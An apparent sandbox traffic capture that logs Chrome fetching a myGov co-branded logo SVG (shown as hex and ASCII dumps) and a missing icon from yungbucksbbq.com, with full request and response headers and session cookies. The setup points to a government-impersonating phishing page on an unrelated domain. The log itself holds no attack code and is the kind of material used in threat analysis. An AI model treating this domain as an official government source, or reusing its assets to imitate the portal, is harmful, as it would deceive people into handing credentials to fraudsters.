                                                        Data Ascii: 3-1,5.93,5.93,0,0,0-5,2.33,8.55,8.55,0,0,0-1.81,5.44,8.44,8.44,0,0,0,1.78,5.33,6,6,0,0,0,5,2.3A6.23,6.23,0,0,0,200.9,170a8.41,8.41,0,0,0,1.57-5.18,9.18,9.18,0,0,0-.86-4,6.25,6.25,0,0,0-2.47-2.78Zm-1.56,11.49a2.58,2.58,0,0,1-.8,1.48,1.76,1.76,0,0,1-1.17.39
                                                        2024-12-25 01:23:16 UTC1369INData Raw: 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 33 20 2d 32 32 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 22 20 64 3d 22 4d 32 34 30 2e 33 2c 31 35 37 2e 31 61 33 2e 37 35 2c 33 2e 37 35 2c 30 2c 30 2c 30 2d 32 2e 30 39 2e 37 34 2c 31 30 2e 35 2c 31 30 2e 35 2c 30 2c 30 2c 30 2d 32 2e 35 34 2c 33 76 2d 33 2e 33 68 2d 35 2e 39 34 76 2e 35 38 61 32 2e 32 38 2c 32 2e 32 38 2c 30 2c 30 2c 31 2c 31 2c 2e 32 37 2c 31 2e 32 34 2c 31 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 35 2e 36 34 2c 35 2e 36 38 2c 35 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 33 2c 31 2e 35 39 76 38 41 34 2e 38 32 2c 34 2e 38 32 2c 30 2c 30 2c 31 2c 32 33 31 2c 31 37 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2d 31 2e 32 38 2e 35 31 76 2e 35 36 68 37 2e
                                                        Data Ascii: transform="translate(-23 -22)"/><path class="cls-1" d="M240.3,157.1a3.75,3.75,0,0,0-2.09.74,10.5,10.5,0,0,0-2.54,3v-3.3h-5.94v.58a2.28,2.28,0,0,1,1,.27,1.24,1.24,0,0,1,.45.64,5.68,5.68,0,0,1,.13,1.59v8A4.82,4.82,0,0,1,231,171a1.7,1.7,0,0,1-1.28.51v.56h7.
                                                        2024-12-25 01:23:16 UTC1369INData Raw: 33 2e 38 31 2d 32 2e 36 34 2c 34 2e 37 34 2c 34 2e 37 34 2c 30 2c 30 2c 30 2d 32 2e 32 34 2e 35 33 2c 38 2c 38 2c 30 2c 30 2c 30 2d 32 2e 32 2c 31 2e 38 31 76 2d 31 2e 39 31 48 32 36 30 76 2e 35 38 61 31 2e 38 31 2c 31 2e 38 31 2c 30 2c 30 2c 31 2c 31 2e 32 36 2e 35 32 2c 34 2e 30 36 2c 34 2e 30 36 2c 30 2c 30 2c 31 2c 2e 33 31 2c 32 2e 30 36 76 38 2e 32 31 61 34 2e 33 33 2c 34 2e 33 33 2c 30 2c 30 2c 31 2d 2e 32 36 2c 32 2c 31 2e 38 32 2c 31 2e 38 32 2c 30 2c 30 2c 31 2d 31 2e 33 31 2e 35 39 76 2e 35 36 68 37 2e 35 76 2d 2e 35 36 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 31 2e 32 38 2d 2e 35 38 2c 34 2e 35 33 2c 34 2e 35 33 2c 30 2c 30 2c 31 2d 2e 32 39 2d 32 76 2d 37 2e 38 31 61 36 2c 36 2c 30 2c 30 2c 31 2c 31 2e 35 36 2d 31 2e 36 35 2c 32 2e
                                                        Data Ascii: 3.81-2.64,4.74,4.74,0,0,0-2.24.53,8,8,0,0,0-2.2,1.81v-1.91H260v.58a1.81,1.81,0,0,1,1.26.52,4.06,4.06,0,0,1,.31,2.06v8.21a4.33,4.33,0,0,1-.26,2,1.82,1.82,0,0,1-1.31.59v.56h7.5v-.56a1.62,1.62,0,0,1-1.28-.58,4.53,4.53,0,0,1-.29-2v-7.81a6,6,0,0,1,1.56-1.65,2.
                                                        2024-12-25 01:23:16 UTC1369INData Raw: 2e 34 38 2c 33 2e 34 38 2c 30 2c 30 2c 30 2d 32 2e 33 35 2d 2e 37 39 2c 34 2e 34 38 2c 34 2e 34 38 2c 30 2c 30 2c 30 2d 32 2e 32 31 2e 35 36 2c 38 2e 32 2c 38 2e 32 2c 30 2c 30 2c 30 2d 32 2e 31 34 2c 31 2e 37 35 76 2d 31 2e 38 38 48 32 39 38 76 2e 35 38 61 31 2e 38 31 2c 31 2e 38 31 2c 30 2c 30 2c 31 2c 31 2e 32 36 2e 35 32 2c 34 2c 34 2c 30 2c 30 2c 31 2c 2e 33 32 2c 32 2e 30 36 76 38 2e 32 31 61 34 2e 34 32 2c 34 2e 34 32 2c 30 2c 30 2c 31 2d 2e 32 37 2c 32 2c 31 2e 38 2c 31 2e 38 2c 30 2c 30 2c 31 2d 31 2e 33 31 2e 35 39 76 2e 35 36 68 37 2e 33 36 76 2d 2e 35 36 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 31 2e 31 34 2d 2e 35 34 2c 34 2e 34 32 2c 34 2e 34 32 2c 30 2c 30 2c 31 2d 2e 32 39 2d 32 2e 30 37 76 2d 37 2e 37 39 71 31 2e 31 34 2d 31 2e
                                                        Data Ascii: .48,3.48,0,0,0-2.35-.79,4.48,4.48,0,0,0-2.21.56,8.2,8.2,0,0,0-2.14,1.75v-1.88H298v.58a1.81,1.81,0,0,1,1.26.52,4,4,0,0,1,.32,2.06v8.21a4.42,4.42,0,0,1-.27,2,1.8,1.8,0,0,1-1.31.59v.56h7.36v-.56a1.62,1.62,0,0,1-1.14-.54,4.42,4.42,0,0,1-.29-2.07v-7.79q1.14-1.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        21192.168.2.449787104.21.112.14432344C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-25 01:23:16 UTC838OUTGET /portbiz/images/myGov-cobranded-logo-white.svg HTTP/1.1
                                                        Host: yungbucksbbq.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA; BHrbNRcajq8FC4XNkrvHx1cPp6M=1735089786; nPYTYev3FqKZHCvVaQ5DzSPcR8A=1735176186; AtgwaW3pNgQLbbw1puZhEbQd5Bo=5OQRJSKHWWav-JU40KaY81y8qb4
                                                        2024-12-25 01:23:16 UTC1073INHTTP/1.1 200 OK
                                                        Date: Wed, 25 Dec 2024 01:23:16 GMT
                                                        Content-Type: image/svg+xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        X-Content-Type-Options: nosniff
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block
                                                        X-XSS-Protection: 1; mode=block
                                                        Cache-Control: max-age=5184000
                                                        Pragma: public
                                                        Last-Modified: Wed, 11 Dec 2024 06:10:16 GMT
                                                        Expires: Fri, 21 Feb 2025 14:30:35 GMT
                                                        CF-Cache-Status: HIT
                                                        Age: 125561
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U9nRMlmurTLuflMLvKJY7fMJxucrk47K%2FaVwf5D%2F6O1gN5Z8iAYCRaqAM3JDwQvLX0NUNTdLHpV0tg466Wse5%2FSRwtnidOHhInHlXmgm5hrA2k0Z4BGZm6EnCH4a4vFJKZzG"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8f75065bcf3a727b-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1972&min_rtt=1969&rtt_var=745&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1416&delivery_rate=1461461&cwnd=232&unsent_bytes=0&cid=271ca2c0e19d5154&ts=445&x=0"
                                                        2024-12-25 01:23:16 UTC296INData Raw: 37 63 34 36 0d 0a 3c 73 76 67 20 69 64 3d 22 4c 61 79 65 72 5f 31 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 4c 61 79 65 72 20 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 36 39 33 2e 34 37 20 31 35 30 2e 35 37 22 3e 3c 64 65 66 73 3e 3c 73 74 79 6c 65 3e 2e 63 6c 73 2d 31 7b 66 69 6c 6c 3a 23 66 66 66 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 64 65 66 73 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 22 20 64 3d 22 4d 34 32 30 2c 32 32 2e 30 39 61 38 2e 37 36 2c 38 2e 37 36 2c 30 2c 30 2c 30 2d 38 2e 37 36 2c 38 2e 37 36 56 35 33 2e 35 31 4c 34 35 35 2c 39 37 2e 33 33 6c 2d 34 33 2e 38 32 2c 34 33 2e 38 31 76 32 32 2e 36 37 41 38 2e 37 35 2c 38 2e
                                                        Data Ascii: 7c46<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 693.47 150.57"><defs><style>.cls-1{fill:#fff;}</style></defs><path class="cls-1" d="M420,22.09a8.76,8.76,0,0,0-8.76,8.76V53.51L455,97.33l-43.82,43.81v22.67A8.75,8.
                                                        2024-12-25 01:23:16 UTC1369INData Raw: 2e 36 35 61 38 2e 37 35 2c 38 2e 37 35 2c 30 2c 30 2c 30 2d 36 2e 32 2d 32 2e 35 36 5a 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 33 20 2d 32 32 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 22 20 64 3d 22 4d 33 38 32 2e 33 31 2c 32 34 2e 36 33 61 38 2e 37 36 2c 38 2e 37 36 2c 30 2c 30 2c 30 2d 31 34 2e 39 33 2c 36 2e 32 32 56 31 36 33 2e 37 38 61 38 2e 37 36 2c 38 2e 37 36 2c 30 2c 30 2c 30 2c 31 35 2c 36 2e 31 38 6c 32 38 2e 38 31 2d 32 38 2e 38 32 56 35 33 2e 35 31 4c 33 38 32 2e 33 31 2c 32 34 2e 36 33 5a 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 33 20 2d 32 32 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 22 20 64 3d 22 4d 34 32 2e 31 31 2c 31 36
                                                        Data Ascii: .65a8.75,8.75,0,0,0-6.2-2.56Z" transform="translate(-23 -22)"/><path class="cls-1" d="M382.31,24.63a8.76,8.76,0,0,0-14.93,6.22V163.78a8.76,8.76,0,0,0,15,6.18l28.81-28.82V53.51L382.31,24.63Z" transform="translate(-23 -22)"/><path class="cls-1" d="M42.11,16
                                                        2024-12-25 01:23:16 UTC1369INData Raw: 33 33 2c 33 2e 33 33 2c 30 2c 30 2c 31 2d 2e 35 35 2e 36 37 2e 39 32 2e 39 32 2c 30 2c 30 2c 31 2d 2e 34 34 2e 31 2c 31 2e 34 36 2c 31 2e 34 36 2c 30 2c 30 2c 31 2d 2e 36 39 2d 2e 32 33 2c 35 2c 35 2c 30 2c 30 2c 30 2d 32 2e 32 39 2d 2e 35 38 2c 34 2e 32 33 2c 34 2e 32 33 2c 30 2c 30 2c 30 2d 33 2e 33 36 2c 31 2e 33 37 2c 34 2e 36 2c 34 2e 36 2c 30 2c 30 2c 30 2d 31 2e 31 34 2c 33 2c 34 2e 33 38 2c 34 2e 33 38 2c 30 2c 30 2c 30 2c 31 2c 32 2e 38 31 2c 31 36 2e 34 2c 31 36 2e 34 2c 30 2c 30 2c 30 2c 33 2e 30 38 2c 32 2e 35 32 2c 31 31 2e 34 32 2c 31 31 2e 34 32 2c 30 2c 30 2c 31 2c 32 2e 30 38 2c 31 2e 36 35 2c 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2c 2e 34 37 2c 31 2e 32 39 2c 31 2e 35 33 2c 31 2e 35 33 2c 30 2c 30 2c 31 2d 2e 34 38 2c 31 2e 31 32
                                                        Data Ascii: 33,3.33,0,0,1-.55.67.92.92,0,0,1-.44.1,1.46,1.46,0,0,1-.69-.23,5,5,0,0,0-2.29-.58,4.23,4.23,0,0,0-3.36,1.37,4.6,4.6,0,0,0-1.14,3,4.38,4.38,0,0,0,1,2.81,16.4,16.4,0,0,0,3.08,2.52,11.42,11.42,0,0,1,2.08,1.65,1.92,1.92,0,0,1,.47,1.29,1.53,1.53,0,0,1-.48,1.12
                                                        2024-12-25 01:23:16 UTC1369INData Raw: 30 2c 30 2c 30 2c 31 2e 34 33 2e 35 33 2c 31 2e 35 35 2c 31 2e 35 35 2c 30 2c 30 2c 30 2c 31 2e 32 31 2d 2e 35 37 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 30 2c 2e 35 32 2d 31 2e 36 32 2c 32 2c 32 2c 30 2c 30 2c 30 2d 2e 35 34 2d 31 2e 35 31 2c 31 2e 37 37 2c 31 2e 37 37 2c 30 2c 30 2c 30 2d 31 2e 33 38 2d 2e 35 34 5a 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 33 20 2d 32 32 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 22 20 64 3d 22 4d 31 30 37 2e 38 35 2c 31 37 30 2e 32 38 61 2e 35 36 2e 35 36 2c 30 2c 30 2c 31 2d 2e 33 36 2d 2e 31 32 2e 37 39 2e 37 39 2c 30 2c 30 2c 31 2d 2e 32 33 2d 2e 33 38 2c 36 2c 36 2c 30 2c 30 2c 31 2d 2e 30 38 2d 31 2e 32 36 76 2d 35 2e 36 34 61 31 32 2e 35 31 2c 31 32 2e
                                                        Data Ascii: 0,0,0,1.43.53,1.55,1.55,0,0,0,1.21-.57,2.39,2.39,0,0,0,.52-1.62,2,2,0,0,0-.54-1.51,1.77,1.77,0,0,0-1.38-.54Z" transform="translate(-23 -22)"/><path class="cls-1" d="M107.85,170.28a.56.56,0,0,1-.36-.12.79.79,0,0,1-.23-.38,6,6,0,0,1-.08-1.26v-5.64a12.51,12.
                                                        2024-12-25 01:23:16 UTC1369INData Raw: 30 2d 31 2e 37 2d 34 2e 31 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 30 2d 31 2e 36 39 2e 37 31 2c 32 2e 33 2c 32 2e 33 2c 30 2c 30 2c 30 2d 2e 37 2c 31 2e 37 5a 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 33 20 2d 32 32 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 22 20 64 3d 22 4d 31 32 34 2e 33 31 2c 31 36 39 2e 30 35 56 31 35 37 2e 35 33 68 2d 36 2e 31 76 2e 35 38 61 31 2e 39 2c 31 2e 39 2c 30 2c 30 2c 31 2c 31 2e 33 39 2e 34 39 2c 33 2e 34 34 2c 33 2e 34 34 2c 30 2c 30 2c 31 2c 2e 33 35 2c 32 76 38 2e 34 39 61 33 2e 34 36 2c 33 2e 34 36 2c 30 2c 30 2c 31 2d 2e 33 31 2c 31 2e 39 2c 31 2e 39 2c 31 2e 39 2c 30 2c 30 2c 31 2d 31 2e 34 33 2e 35 36 76 2e 35 36 68 37 2e 38 35 76 2d 2e 35 36 61 31 2e 39
                                                        Data Ascii: 0-1.7-4.1,2.25,2.25,0,0,0-1.69.71,2.3,2.3,0,0,0-.7,1.7Z" transform="translate(-23 -22)"/><path class="cls-1" d="M124.31,169.05V157.53h-6.1v.58a1.9,1.9,0,0,1,1.39.49,3.44,3.44,0,0,1,.35,2v8.49a3.46,3.46,0,0,1-.31,1.9,1.9,1.9,0,0,1-1.43.56v.56h7.85v-.56a1.9
                                                        2024-12-25 01:23:16 UTC1369INData Raw: 30 2c 30 2c 30 2d 32 2e 32 31 2e 35 36 2c 38 2e 33 39 2c 38 2e 33 39 2c 30 2c 30 2c 30 2d 32 2e 31 35 2c 31 2e 37 35 76 2d 31 2e 38 38 68 2d 35 2e 39 32 76 2e 35 38 61 31 2e 38 36 2c 31 2e 38 36 2c 30 2c 30 2c 31 2c 31 2e 32 36 2e 35 32 2c 34 2e 31 38 2c 34 2e 31 38 2c 30 2c 30 2c 31 2c 2e 33 31 2c 32 2e 30 36 76 38 2e 32 31 61 34 2e 32 37 2c 34 2e 32 37 2c 30 2c 30 2c 31 2d 2e 32 37 2c 32 2c 31 2e 37 39 2c 31 2e 37 39 2c 30 2c 30 2c 31 2d 31 2e 33 2e 35 39 76 2e 35 36 68 37 2e 33 36 76 2d 2e 35 36 61 31 2e 35 38 2c 31 2e 35 38 2c 30 2c 30 2c 31 2d 31 2e 31 34 2d 2e 35 34 2c 34 2e 33 38 2c 34 2e 33 38 2c 30 2c 30 2c 31 2d 2e 33 2d 32 2e 30 37 76 2d 37 2e 37 39 71 31 2e 31 35 2d 31 2e 39 32 2c 32 2e 34 39 2d 31 2e 39 32 61 31 2e 31 32 2c 31 2e 31 32 2c 30
                                                        Data Ascii: 0,0,0-2.21.56,8.39,8.39,0,0,0-2.15,1.75v-1.88h-5.92v.58a1.86,1.86,0,0,1,1.26.52,4.18,4.18,0,0,1,.31,2.06v8.21a4.27,4.27,0,0,1-.27,2,1.79,1.79,0,0,1-1.3.59v.56h7.36v-.56a1.58,1.58,0,0,1-1.14-.54,4.38,4.38,0,0,1-.3-2.07v-7.79q1.15-1.92,2.49-1.92a1.12,1.12,0
                                                        2024-12-25 01:23:16 UTC1369INData Raw: 35 2e 39 33 2c 30 2c 30 2c 30 2d 35 2c 32 2e 33 33 2c 38 2e 35 35 2c 38 2e 35 35 2c 30 2c 30 2c 30 2d 31 2e 38 31 2c 35 2e 34 34 2c 38 2e 34 34 2c 38 2e 34 34 2c 30 2c 30 2c 30 2c 31 2e 37 38 2c 35 2e 33 33 2c 36 2c 36 2c 30 2c 30 2c 30 2c 35 2c 32 2e 33 41 36 2e 32 33 2c 36 2e 32 33 2c 30 2c 30 2c 30 2c 32 30 30 2e 39 2c 31 37 30 61 38 2e 34 31 2c 38 2e 34 31 2c 30 2c 30 2c 30 2c 31 2e 35 37 2d 35 2e 31 38 2c 39 2e 31 38 2c 39 2e 31 38 2c 30 2c 30 2c 30 2d 2e 38 36 2d 34 2c 36 2e 32 35 2c 36 2e 32 35 2c 30 2c 30 2c 30 2d 32 2e 34 37 2d 32 2e 37 38 5a 6d 2d 31 2e 35 36 2c 31 31 2e 34 39 61 32 2e 35 38 2c 32 2e 35 38 2c 30 2c 30 2c 31 2d 2e 38 2c 31 2e 34 38 2c 31 2e 37 36 2c 31 2e 37 36 2c 30 2c 30 2c 31 2d 31 2e 31 37 2e 33 39 2c 31 2e 37 2c 31 2e 37 2c
                                                        Data Ascii: 5.93,0,0,0-5,2.33,8.55,8.55,0,0,0-1.81,5.44,8.44,8.44,0,0,0,1.78,5.33,6,6,0,0,0,5,2.3A6.23,6.23,0,0,0,200.9,170a8.41,8.41,0,0,0,1.57-5.18,9.18,9.18,0,0,0-.86-4,6.25,6.25,0,0,0-2.47-2.78Zm-1.56,11.49a2.58,2.58,0,0,1-.8,1.48,1.76,1.76,0,0,1-1.17.39,1.7,1.7,
                                                        2024-12-25 01:23:16 UTC1369INData Raw: 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 33 20 2d 32 32 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 22 20 64 3d 22 4d 32 34 30 2e 33 2c 31 35 37 2e 31 61 33 2e 37 35 2c 33 2e 37 35 2c 30 2c 30 2c 30 2d 32 2e 30 39 2e 37 34 2c 31 30 2e 35 2c 31 30 2e 35 2c 30 2c 30 2c 30 2d 32 2e 35 34 2c 33 76 2d 33 2e 33 68 2d 35 2e 39 34 76 2e 35 38 61 32 2e 32 38 2c 32 2e 32 38 2c 30 2c 30 2c 31 2c 31 2c 2e 32 37 2c 31 2e 32 34 2c 31 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 35 2e 36 34 2c 35 2e 36 38 2c 35 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 33 2c 31 2e 35 39 76 38 41 34 2e 38 32 2c 34 2e 38 32 2c 30 2c 30 2c 31 2c 32 33 31 2c 31 37 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2d 31 2e 32 38 2e 35 31 76 2e 35 36 68 37 2e 38 36 76 2d 2e 35 36 61 33
                                                        Data Ascii: m="translate(-23 -22)"/><path class="cls-1" d="M240.3,157.1a3.75,3.75,0,0,0-2.09.74,10.5,10.5,0,0,0-2.54,3v-3.3h-5.94v.58a2.28,2.28,0,0,1,1,.27,1.24,1.24,0,0,1,.45.64,5.68,5.68,0,0,1,.13,1.59v8A4.82,4.82,0,0,1,231,171a1.7,1.7,0,0,1-1.28.51v.56h7.86v-.56a3
                                                        2024-12-25 01:23:16 UTC1369INData Raw: 2c 34 2e 37 34 2c 34 2e 37 34 2c 30 2c 30 2c 30 2d 32 2e 32 34 2e 35 33 2c 38 2c 38 2c 30 2c 30 2c 30 2d 32 2e 32 2c 31 2e 38 31 76 2d 31 2e 39 31 48 32 36 30 76 2e 35 38 61 31 2e 38 31 2c 31 2e 38 31 2c 30 2c 30 2c 31 2c 31 2e 32 36 2e 35 32 2c 34 2e 30 36 2c 34 2e 30 36 2c 30 2c 30 2c 31 2c 2e 33 31 2c 32 2e 30 36 76 38 2e 32 31 61 34 2e 33 33 2c 34 2e 33 33 2c 30 2c 30 2c 31 2d 2e 32 36 2c 32 2c 31 2e 38 32 2c 31 2e 38 32 2c 30 2c 30 2c 31 2d 31 2e 33 31 2e 35 39 76 2e 35 36 68 37 2e 35 76 2d 2e 35 36 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 31 2e 32 38 2d 2e 35 38 2c 34 2e 35 33 2c 34 2e 35 33 2c 30 2c 30 2c 31 2d 2e 32 39 2d 32 76 2d 37 2e 38 31 61 36 2c 36 2c 30 2c 30 2c 31 2c 31 2e 35 36 2d 31 2e 36 35 2c 32 2e 30 38 2c 32 2e 30 38 2c 30
                                                        Data Ascii: ,4.74,4.74,0,0,0-2.24.53,8,8,0,0,0-2.2,1.81v-1.91H260v.58a1.81,1.81,0,0,1,1.26.52,4.06,4.06,0,0,1,.31,2.06v8.21a4.33,4.33,0,0,1-.26,2,1.82,1.82,0,0,1-1.31.59v.56h7.5v-.56a1.62,1.62,0,0,1-1.28-.58,4.53,4.53,0,0,1-.29-2v-7.81a6,6,0,0,1,1.56-1.65,2.08,2.08,0
                                                        2024-12-25 01:23:16 UTC1369INData Raw: 30 2c 30 2c 30 2d 32 2e 33 35 2d 2e 37 39 2c 34 2e 34 38 2c 34 2e 34 38 2c 30 2c 30 2c 30 2d 32 2e 32 31 2e 35 36 2c 38 2e 32 2c 38 2e 32 2c 30 2c 30 2c 30 2d 32 2e 31 34 2c 31 2e 37 35 76 2d 31 2e 38 38 48 32 39 38 76 2e 35 38 61 31 2e 38 31 2c 31 2e 38 31 2c 30 2c 30 2c 31 2c 31 2e 32 36 2e 35 32 2c 34 2c 34 2c 30 2c 30 2c 31 2c 2e 33 32 2c 32 2e 30 36 76 38 2e 32 31 61 34 2e 34 32 2c 34 2e 34 32 2c 30 2c 30 2c 31 2d 2e 32 37 2c 32 2c 31 2e 38 2c 31 2e 38 2c 30 2c 30 2c 31 2d 31 2e 33 31 2e 35 39 76 2e 35 36 68 37 2e 33 36 76 2d 2e 35 36 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 31 2e 31 34 2d 2e 35 34 2c 34 2e 34 32 2c 34 2e 34 32 2c 30 2c 30 2c 31 2d 2e 32 39 2d 32 2e 30 37 76 2d 37 2e 37 39 71 31 2e 31 34 2d 31 2e 39 32 2c 32 2e 34 39 2d 31
                                                        Data Ascii: 0,0,0-2.35-.79,4.48,4.48,0,0,0-2.21.56,8.2,8.2,0,0,0-2.14,1.75v-1.88H298v.58a1.81,1.81,0,0,1,1.26.52,4,4,0,0,1,.32,2.06v8.21a4.42,4.42,0,0,1-.27,2,1.8,1.8,0,0,1-1.31.59v.56h7.36v-.56a1.62,1.62,0,0,1-1.14-.54,4.42,4.42,0,0,1-.29-2.07v-7.79q1.14-1.92,2.49-1


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        22192.168.2.449788104.21.112.14432344C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-25 01:23:16 UTC1086OUTGET /portbiz/icons/icon-blugov-info.svg HTTP/1.1
                                                        Host: yungbucksbbq.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://yungbucksbbq.com/portbiz/css/blugov.css
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA; BHrbNRcajq8FC4XNkrvHx1cPp6M=1735089786; nPYTYev3FqKZHCvVaQ5DzSPcR8A=1735176186; AtgwaW3pNgQLbbw1puZhEbQd5Bo=5OQRJSKHWWav-JU40KaY81y8qb4
                                                        2024-12-25 01:23:16 UTC1091INHTTP/1.1 404 Not Found
                                                        Date: Wed, 25 Dec 2024 01:23:16 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        X-Content-Type-Options: nosniff
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block
                                                        X-XSS-Protection: 1; mode=block
                                                        Cache-Control: public, max-age=315360000, stale-while-revalidate=315360000, stale-if-error=315360000, immutable
                                                        Pragma: public
                                                        CF-Cache-Status: HIT
                                                        Age: 125559
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YQKD6%2FE1L43FiYY9RUqYV%2B9GFUtR6Oc92WratzqVo9SDtmwZVUQ59rmR1I4WNw0gjHFnm07wZ06kOp7Btgx%2BTfxdbbycJjUU0Gmm9ipN58HDaySnVEm3nmjn0ltaOb5nZQRT"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8f75065c48cc43b3-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1593&rtt_var=604&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1664&delivery_rate=1833019&cwnd=198&unsent_bytes=0&cid=85e5327e084b8ac6&ts=452&x=0"
